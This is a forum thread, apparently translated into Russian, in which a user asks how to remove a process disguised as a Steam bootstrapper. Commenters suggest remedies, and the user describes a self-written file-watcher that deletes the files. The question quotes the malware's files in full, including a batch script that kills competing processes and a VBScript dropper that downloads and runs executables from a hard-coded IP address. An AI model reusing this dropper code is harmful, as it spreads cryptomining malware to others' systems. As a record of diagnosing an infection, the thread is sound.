Как навсегда убить Steam клиента начальной загрузки

3509
Yuriy Zaletskyy

У меня в диспетчере задач следующая ситуация:

Task Manager - Processes

Я не знаю, какое это приложение, но определенно не загрузчик клиента Steam, потому что я его не установил и тоже не могу удалить.

Если я попытаюсь выяснить, что это за приложение, через этот шаг:

Task Manager - Go to details

Я вижу что-то вроде этого:

Task Manager - Details

В утилите MS Config я не нашел ничего похожего secury.exe.

Когда я открываю местоположение файла, я вижу три файла:

m.bat, b.exe, 4.vbs.

Ниже приводится содержание m.bat:

taskkill /f /t /im secury.exe c:\ProgramData\secury.exe taskkill /f /t /im kingsoft.exe taskkill /f /t /im expl0rer.exe taskkill /f /t /im ieplare.exev taskkill /f /t /im nssm.exe taskkill /f /t /im MSASCui.exe taskkill /f /t /im SystemSettlngs.exe taskkill /f /t /im SystemSetting.exe taskkill /f /t /im Process.exe taskkill /f /t /im winlnlt.exe taskkill /f /t /im WindowsUpgrade.exe taskkill /f /t /im msdc.exe taskkill /f /t /im Fiddlere.exe taskkill /f /t /im shovst.exe taskkill /f /t /im lqrtqe.exe taskkill /f /t /im apkls.exe taskkill /f /t /im winlog.exe taskkill /f /t /im svchosts.exe taskkill /f /t /im win1ogins.exe taskkill /f /t /im shovsts.exe taskkill /f /t /im fcty.exe taskkill /f /t /im soiuos.exe taskkill /f /t /im TrustedInstaller.exe del C:\Windows\System32\soiuos.exe del C:\Windows\Setup\TrustedInstaller.exe del C:\ProgramData\kingsoft.exe del C:\ProgramData\expl0rer.exe del C:\ProgramData\ieplare.exe del C:\ProgramData\nssm.exe del C:\ProgramData\MSASCui.exe del C:\ProgramData\SystemSettlngs.exe del C:\ProgramData\SystemSetting.exe del C:\ProgramData\Process.exe del C:\ProgramData\winlnlt.exe del C:\ProgramData\WindowsUpgrade.exe del C:\ProgramData\msdc.exe del C:\ProgramData\Fiddlere.exe del C:\ProgramData\shovst.exe del C:\ProgramData\lqrtqe.exe del C:\ProgramData\apkls.exe del C:\ProgramData\winlog.exe del C:\ProgramData\svchosts.exe del C:\ProgramData\win1ogins.exe del C:\ProgramData\shovsts.exe del C:\ProgramData\fcty.exe del C:\ProgramData\pool.exe del C:\ProgramData\pool2.exe del C:\ProgramData\pool3.exe

Далее идет 4.vbs:

Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://223.68.209.7:65510/2.exe",0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "c:\ProgramData\s2.exe",2 Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "c:\ProgramData\pool2.exe",2 CreateObject("WScript.Shell").Run "C:\ProgramData\pool3.exe" CreateObject("WScript.Shell").Run "del C:\ProgramData\pool3.exe"

Что я могу сделать, чтобы не secury.exeзлоупотреблять вычислительной мощностью моего сервера?

PS Я выполнил полную проверку Avast моего компьютера, но он не нашел ничего плохого.

0
Это ... выглядит очень подозрительно (содержание этих командных файлов и VBS). Есть ли шанс, что вы перейдете в безопасный режим (и, надеюсь, эта штука не работает), а затем вы можете попытаться удалить их? Если безопасный режим недоступен - загрузитесь с внешнего диска (или Linux LiveUSB / LiveCD) и с доступным жестким диском - удалите эти файлы? Darius 6 лет назад 0
На данный момент вы должны предположить, что ваш компьютер был полностью взломан. Вы можете запустить несколько программ проверки на вирусы и молиться, чтобы они сработали, но я бы порекомендовал сделать резервную копию всего важного, а затем отформатировать и переустановить Windows. Richard 6 лет назад 1
Я удалял эти файлы много раз, но это не сработало Yuriy Zaletskyy 6 лет назад 0

1 ответ на вопрос

0
Yuriy Zaletskyy

Я хочу поделиться решением, которое я нашел для своей проблемы.

Как программист, я создал программу, которая постоянно отслеживает c:\ProgramData\наличие новых файлов в папке. И если некоторые из файлов, которые принадлежат «начальному загрузчику Steam», появляются внутри этой папки, моя программа удаляет эти файлы, прежде чем они будут выполнены. Если кому-то нужно изменить эту утилиту, вы можете найти ее на GitHub .

После того, как я запустил этот примитивный антивирус (на самом деле antiPUP), моя система перестала работать медленно. Еще одна деталь, которая требуется для этой программы, чтобы работать со стабильностью, - это требование создать папку c:\ProgramData\copyForVirus\. Я создал программу для создания копии этих вирусных файлов, чтобы затем проанализировать их в какой-то еще среде VM Ware и выяснить, что является внутренним содержимым этих файлов.

Похожие вопросы